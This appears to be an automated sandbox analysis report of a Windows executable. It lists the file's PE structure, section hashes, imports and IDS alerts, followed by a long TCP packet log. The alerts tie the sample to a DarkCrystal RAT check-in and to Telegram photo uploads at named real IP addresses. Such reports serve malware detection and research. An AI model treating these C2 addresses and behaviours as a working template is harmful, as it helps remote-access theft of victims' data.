push eax
call 00007F368483F939h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F368483CAF8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F368483F91Ch
int3
jmp 00007F36848413B7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T14:52:00.960663+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	34.117.59.81	443	TCP
2025-01-01T14:52:02.454624+0100	1810009	Joe Security ANOMALY Telegram Send Photo	1	192.168.2.4	49732	149.154.167.220	443	TCP
2025-01-01T14:52:07.667335+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49733	104.21.38.84	80	TCP
2025-01-01T14:52:13.163133+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49749	34.117.59.81	443	TCP
2025-01-01T14:52:14.162081+0100	1810009	Joe Security ANOMALY Telegram Send Photo	1	192.168.2.4	49753	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 14:51:59.679704905 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:51:59.679748058 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:51:59.679980040 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:51:59.692620993 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:51:59.692635059 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.201219082 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.201278925 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.204073906 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.204081059 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.204418898 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.245383024 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.248650074 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.291330099 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.371048927 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.371117115 CET	443	49730	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.371202946 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.375946999 CET	49730	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.378895044 CET	49731	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.378931999 CET	443	49731	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.379009008 CET	49731	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.379251003 CET	49731	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.379266977 CET	443	49731	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.831131935 CET	443	49731	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.832628965 CET	49731	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.832644939 CET	443	49731	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.960414886 CET	443	49731	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.960469007 CET	443	49731	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:00.960596085 CET	49731	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:00.960978031 CET	49731	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:01.529051065 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:01.529083014 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:01.529143095 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:01.536418915 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:01.536431074 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.156599998 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.156680107 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.160420895 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.160430908 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.160777092 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.161847115 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.207329988 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.454380035 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.463934898 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.463947058 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.466141939 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.466146946 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.466290951 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.466294050 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.467669964 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.467680931 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.467782974 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.467788935 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.467855930 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.467860937 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.467897892 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.467902899 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.467941999 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.467947006 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468003035 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468008995 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468028069 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468035936 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468106031 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468110085 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468125105 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468132019 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468156099 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468161106 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468206882 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468211889 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468241930 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468245029 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468254089 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468260050 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468297005 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468302011 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468360901 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468365908 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468379021 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468391895 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468409061 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468420029 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468426943 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468466997 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468472958 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468528032 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468534946 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468549013 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468553066 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468566895 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468570948 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468614101 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468620062 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468652964 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468657970 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:02.468713999 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:02.468734980 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:03.281500101 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:03.281579971 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:03.281601906 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:03.281651020 CET	443	49732	149.154.167.220	192.168.2.4
Jan 1, 2025 14:52:03.281708956 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:03.282414913 CET	49732	443	192.168.2.4	149.154.167.220
Jan 1, 2025 14:52:07.099978924 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.104876041 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.105038881 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.106208086 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.110976934 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.465198040 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.470279932 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.558592081 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.667335033 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.825913906 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.825967073 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.826025009 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.863492966 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.868444920 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.959615946 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:07.960716009 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:07.965512037 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.044409037 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.049381971 CET	80	49734	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.049503088 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.049796104 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.054622889 CET	80	49734	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.213924885 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.358175039 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.363050938 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.401794910 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.406661034 CET	80	49734	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.454843044 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.455132008 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.460021019 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.460150957 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.493539095 CET	80	49734	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.557976961 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.713139057 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.755443096 CET	80	49734	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.870460987 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.870533943 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.908613920 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.908783913 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.913592100 CET	80	49733	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.913647890 CET	49733	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.913954973 CET	80	49734	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.917025089 CET	49734	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.967340946 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.972265005 CET	80	49737	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:08.972580910 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.972718954 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:08.977490902 CET	80	49737	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:09.323801994 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.329473972 CET	80	49737	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:09.417026043 CET	80	49737	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:09.464303970 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.689493895 CET	80	49737	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:09.696866989 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.702606916 CET	80	49737	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:09.702685118 CET	49737	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.864681005 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.869509935 CET	80	49738	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:09.869607925 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.869743109 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:09.874497890 CET	80	49738	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:10.214369059 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.219506025 CET	80	49738	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:10.313841105 CET	80	49738	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:10.354861021 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.579663992 CET	80	49738	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:10.620508909 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.707997084 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.712975025 CET	80	49738	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:10.713032961 CET	49738	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.714154959 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.718995094 CET	80	49741	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:10.719091892 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.723453045 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:10.728291988 CET	80	49741	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.073700905 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.078634977 CET	80	49741	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.177349091 CET	80	49741	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.370479107 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.447164059 CET	80	49741	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.551611900 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.570918083 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.571932077 CET	49743	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.576613903 CET	80	49741	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.576658964 CET	49741	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.577471018 CET	80	49743	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.577550888 CET	49743	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.577650070 CET	49743	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.582434893 CET	80	49743	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.734042883 CET	49743	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.740159988 CET	49744	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:11.740206003 CET	443	49744	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:11.740257978 CET	49744	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:11.743226051 CET	49744	443	192.168.2.4	34.117.59.81
Jan 1, 2025 14:52:11.743244886 CET	443	49744	34.117.59.81	192.168.2.4
Jan 1, 2025 14:52:11.748404026 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.754632950 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.754688025 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.754810095 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.761241913 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.781588078 CET	80	49743	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.868608952 CET	49746	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.873502016 CET	80	49746	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.873625040 CET	49746	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.873708963 CET	49746	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:11.878457069 CET	80	49746	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.932286978 CET	80	49743	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:11.932341099 CET	49743	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.105091095 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.109962940 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110071898 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110088110 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110104084 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110125065 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110141993 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110157967 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110189915 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110213995 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110219002 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110249043 CET	80	49745	104.21.38.84	192.168.2.4
Jan 1, 2025 14:52:12.110249996 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110289097 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110301018 CET	49745	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:52:12.110301018 CET	80	49745	104.21.38.84	192.168.2.4
